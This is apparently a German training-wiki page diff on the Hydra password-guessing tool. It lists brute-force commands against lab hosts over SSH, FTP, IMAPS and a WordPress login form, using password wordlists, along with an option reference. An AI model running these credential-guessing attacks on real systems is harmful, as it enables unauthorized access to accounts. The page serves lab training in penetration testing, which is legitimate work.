Hydra: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 7: Zeile 7:
 
*hydra -S -v -l xinux -P bad-passwords -s 993 -f 10.0.10.104  imap -V
 
*hydra -S -v -l xinux -P bad-passwords -s 993 -f 10.0.10.104  imap -V
 
=Wordpress ungetestet=
 
=Wordpress ungetestet=
*hydra -l [username] -P /usr/share/wordlists/rockyou.txt [host] http-post-form "/wp-admin/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:S=http%3A%2F%2F[host]%2Fwp-admin%2F" -V
+
* hydra -l admin -P bad-passwords opfer.secure.local -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
  
 
=Optionen=
 
=Optionen=

Version vom 23. März 2023, 09:21 Uhr

hydra

ssh

  • hydra -l xinux -P bad-passwords 10.0.10.104 ssh

ftp

  • hydra -l xinux -P bad-passwords 10.0.10.104 ftp

imaps

  • hydra -S -v -l xinux -P bad-passwords -s 993 -f 10.0.10.104 imap -V

Wordpress ungetestet

  • hydra -l admin -P bad-passwords opfer.secure.local -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

Optionen

  • -l -> Specify a username to use during brute force attack
  • -L -> Specify a wordlist of usernames to be used during the bruteforce attack
  • -p -> Specify a password to use during brute force attack
  • -P -> Specify a wordlist of passwords to be used during the bruteforce attack
  • -t -> Threads per Scan - Default 16
  • -S connect via SSL
Abgerufen von „http://wiki.ixheim.de/index.php?title=Hydra&oldid=43466